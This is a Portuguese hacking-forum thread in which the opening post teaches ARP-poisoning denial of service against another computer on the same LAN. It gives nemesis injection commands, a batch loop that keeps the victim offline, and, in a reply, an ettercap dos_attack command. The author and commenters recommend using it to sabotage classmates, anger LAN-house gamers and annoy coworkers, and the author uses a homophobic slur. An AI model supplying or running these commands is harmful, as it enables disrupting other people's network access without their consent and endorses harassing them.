DoS Em Computador Da Mesma Rede

[S3.nD]

Yehpinho

{Neste tópico você irá aprender como negar o serviço de internet à um computador de uma mesma rede local (LAN).}

# Não, neste tópico você não irá aprender a técnica rakuda do Ping of Death. Você irá aprender (eu acho) como negar o acesso de um computador "vítima"  à rede exterior (internet) por meio do nemesis.

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# Todo computador em uma rede (LAN) troca informações e acessa a internet através de um roteador certo? Quando este computador acessa o router, o mesmo checa seu endereço IP e traduz à uma verificação certa de endereço MAC. Tudo isso através do protocolo ARP.
  ««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
Acesso do computador à rede externa → Checagem de IP e tradução do MAC Adress com protocolo ARP → Resposta de acesso  »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

Já ouviu falar em envenenamento ARP? 

Praticando !

É simples os procedimentos. Por sinal bem simples e divertido!

Bem primeiro precisamos de algumas ferramentas para ambiente windows (por ser o mais pop).

Nemesis Injection Packet ↓
http://www.packetfactory.net/projects/nemesis/

E também temos que saber que:

Meu IP: 168.0.0.13
IP do meu colega: 168.0.0.24
Router: 168.0.0.8

Praticando² !

Bem, vocês devem estar se perguntando: como que eu vou saber todos esses ip's se eu nem sei o que é traceroute/tracert?

→Simples amiguênho. Com alguma sorte ou lábia obtenha acesso à esses computadores (a(as) vítmas e ao seu computador) e lá descubra os respectivos ip's (para uma vítima em especial) ou no DOS mande um simples ping (para uma vítima qualquer). Lembrando que em qualquer método, o primeiro ip é o do roteador.

→Depois  que voce selecionou a vítima ( ip 168.0.0.24), deve-se saber o endereço MAC. Para isso no seu terminal de comandos windons, digite arp -a e então se aparecerá uma tabeça com muitos ip's e seus endereços MAC's. Localize o ip 168.0.0.24 e anote seu endereço MAC.


C:\Aluno13\> arp -a

  Direção IP              Direção      física      Tipo
  168.0.0.8               00-c0-3c-44-a1-d1   dinâmico
  168.0.0.24             00-7f-14-b0-76-6f    dinâmico

C:\Aluno13\>


Depois de tudo anotado  chegou a hora de injetar pacotes  :D

A sintaxe de execução modelo é esta: nemesis arp -D IPvítima -S IProuter -H MACrouter


C:\Aluno13\> nemesis arp -D 168.0.0.24 -S 168.0.0.8 -H FF:FF:FF:FF:FF:FF

ARP Packet Injected

C:\Aluno13\>


Bem, logo depois de injetar pacotes na máquina alvo, vai da para perceber que a conexão do coleguinha caiu pela cara dele com certeza hehe. Mas, você sabia que depois de um tempo a conexão volta (siim, windows ñ é tao ruim assim) ? Para isso não acontecer, acrescente FOR /L %i IN (1,1,5000) DO, fcando assim:


C:\Aluno13\> FOR /L %i IN (1,1,5000) DO nemesis arp -D 168.0.0.24 -S 168.0.0.8 -H FF:FF:FF:FF:FF:FF

ARP Packet Injected

C:\Aluno13\>


C:\Aluno13\> FOR /L %i IN (1,1,5000) DO nemesis arp -D 168.0.0.24 -S 168.0.0.8 -H FF:FF:FF:FF:FF:FF

ARP Packet Injected

C:\Aluno13\>


C:\Aluno13\> FOR /L %i IN (1,1,5000) DO nemesis arp -D 168.0.0.24 -S 168.0.0.8 -H FF:FF:FF:FF:FF:FF

ARP Packet Injected

C:\Aluno13\>

...e vai ficar repetindo muitas e muitas e muitas vezes.


Aih voce me pergunta, que utilidade tem uma coisa dessas? Muitas, interromper o trabalho escolar by google daquele grupo que tem os viadinhos e as meninas feias e chatas da escola (que nem eu fiz), atrasar alguma pesquisa, deixar algum cara cheio de raiva em uma lan house (isso é otimo quando o cara está jogando tibia), tirar a diversão do seu colega de trabalho de algum site de muié pelada ou simplesmente, não ter nada para fazer!

Flw'sz

=)

[KEst]

Já ouvi isso a muito tempo, conhecia como arp neg mas nunca tinha visto realmente, não testei, tu sabe o que o nemesis faz?
que tipo de protocolo ele usa?
alguma dica que possa me ajudar a fazer-lo no linux?
grato!

by KEst

[Joey]

S3.nD meu caro, se eu pudesse eu lhe daria um Ponto positivo, mais como não tenho esse "poder" ficarei lhe devendo hehe...
Não conhecia esse metodo, e olhe que eu sempre quis saber algo parecido, mais a preguiça não deixava eu ir ao nosso querido google pesquisar xD
Execelente artigo, muito bem explicado, parabéns S3.nD!!!

[S3.nD]

Já ouvi isso a muito tempo, conhecia como arp neg mas nunca tinha visto realmente, não testei, tu sabe o que o nemesis faz?
que tipo de protocolo ele usa?
alguma dica que possa me ajudar a fazer-lo no linux?
grato!

by KEst

Nemesis é um injetor de pacotes e por usar protocolos de transferencia, acredito eu que ele trabalha na arquitetura tcp/ip.
No linux cara, uma vez já vi em um outro fórum mas não lembro muito bem o nome do programa. Uso linux também mas fiz este tutorial em ambiente windows por eu ter mais contato com uma rede windows e não com uma rede linux.

Flw'sz

=)

[S3.nD]

S3.nD meu caro, se eu pudesse eu lhe daria um Ponto positivo, mais como não tenho esse "poder" ficarei lhe devendo hehe...
Não conhecia esse metodo, e olhe que eu sempre quis saber algo parecido, mais a preguiça não deixava eu ir ao nosso querido google pesquisar xD
Execelente artigo, muito bem explicado, parabéns S3.nD!!!

huahuahuahuahuhauhauhau

Agora você já sabe, e o melhor jeito de aprender de verdade é praticando  ;)

E muito obrigado pelos elogios, são eles que dão motivos para próximos artigos  ::)

Flw'sz

=)

[Ðark$pawn]

Estou gostando da qualidade dos seus post amigo S3.nD!!!

Ótimo post!

Deixe o sistema de pontuação voltar que você terá um Ponto Positivo já... ;)

[S3.nD]

Estou gostando da qualidade dos seus post amigo S3.nD!!!

Ótimo post!

Deixe o sistema de pontuação voltar que você terá um Ponto Positivo já... ;)

:D :D :D
Muito obrigado DarkSpawn, fico muito grato!!

Flw'sz

=)

[Dr34m3xpl0]

Para os "linuxers" de plantão sera mais pratico e rapido usar novamente o ettercap.
#ettercap -T -q -M ARP //

Depois aperte "p" e digite em baixo:
"dos_attack"

Depois digite o IP da vítima e logo em baixo um IP invalido na rede

Pronto, ele fara um "ataque DOS na rede local"

[DC]

 8) MUITO BACANA...aprendo a cada dia....continue participando...e lembre-se dia 13 a partir das 13:00hrs tem quebra do record de usuários online no Darkers...vc será bem vindo....abraços...♣

[n4n0t3rr0r]

belo tutorial ;d

eu ja trampei em lan house, quando alguem enchia muito o saco, fazia isso; rs

[Dogn]

o link para baixar o arquivo esta quebrado!

mais gostei do tutorial.

peso desculpas pela ignorância, mais q estou entrado agora nesta area...mais gosto muito!

por isso tenho uma duvida sobre a instalação dele, dei uma procurada no google. é achei o "nemesis-1.4"

quando eu abro a pasta, tem vários arquivos eh .txt
é um .exe
clico nele, e a mensagem aparece

"este aplicativo não pode ser iniciado porque não foi encontrado packet.dll. a reinstalação do aplicativo pode corrigir o problema"

o que faço?
o que estou fazendo de errado?
tenho que ter algum compilador?? dev c++ etc...
uso XP

obrigado

[guioximitsu]

Muito bom esse tópico :D :D :D

Para você DOGN:

Procure por essa dll(packet.dll) na internet>baixe-a>e coloque-a no diretório que está o programa.

[Dogn]

bom fis como vc mandou!
mais outra mensagem apareceu:

"não foi possível o ponto de entrada do procedimento PacketGetNetinfo na biblioteca de viculo Dinãmico packet.all"

baixei a dll de varios lugares...o mais o erro continua..

o que eu faço?

obrigado pela ajuda.

[guioximitsu]

Agora o erro está na *.dll,rsrsrs :D :D :D;essa *.dll não é pra esse programa.O certo é ela vir junto com o *.exe,já que é uma dependência dele.
Não consigo te ajudar nessa :(

[LeeLith]

o PhP q eu baixei deu a mesma merda  :'(